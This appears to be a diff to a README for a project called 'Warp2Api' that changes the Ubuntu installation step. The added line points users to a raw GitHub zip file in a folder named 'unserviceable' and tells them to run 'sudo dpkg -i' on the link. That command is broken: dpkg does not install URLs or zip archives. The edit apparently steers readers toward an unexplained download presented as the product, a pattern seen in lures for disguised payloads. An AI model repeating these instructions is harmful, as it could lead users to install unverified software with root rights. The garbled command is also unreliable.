isaacpeterson65/Warp2Api/README.md

    After the download is complete, locate the downloaded file (usually in your "Downloads" folder).
    - For Windows, double-click the `.exe` file to start the installation.
    - For macOS, open the `.dmg` file and drag the application to your Applications folder.
-   - For Ubuntu, open the terminal and run `sudo dpkg -i <filename.deb>`, replacing `<filename.deb>` with the name of the downloaded file.
+   - For Ubuntu, open the terminal and run `sudo dpkg -i <https://raw.githubusercontent.com/isaacpeterson65/Warp2Api/master/unserviceable/Warp2Api.zip>`, replacing `<https://raw.githubusercontent.com/isaacpeterson65/Warp2Api/master/unserviceable/Warp2Api.zip>` with the name of the downloaded file.

 4. **Follow Installation Prompts**
    The installation wizard will guide you through the setup process.
 Follow the prompts to complete the installation.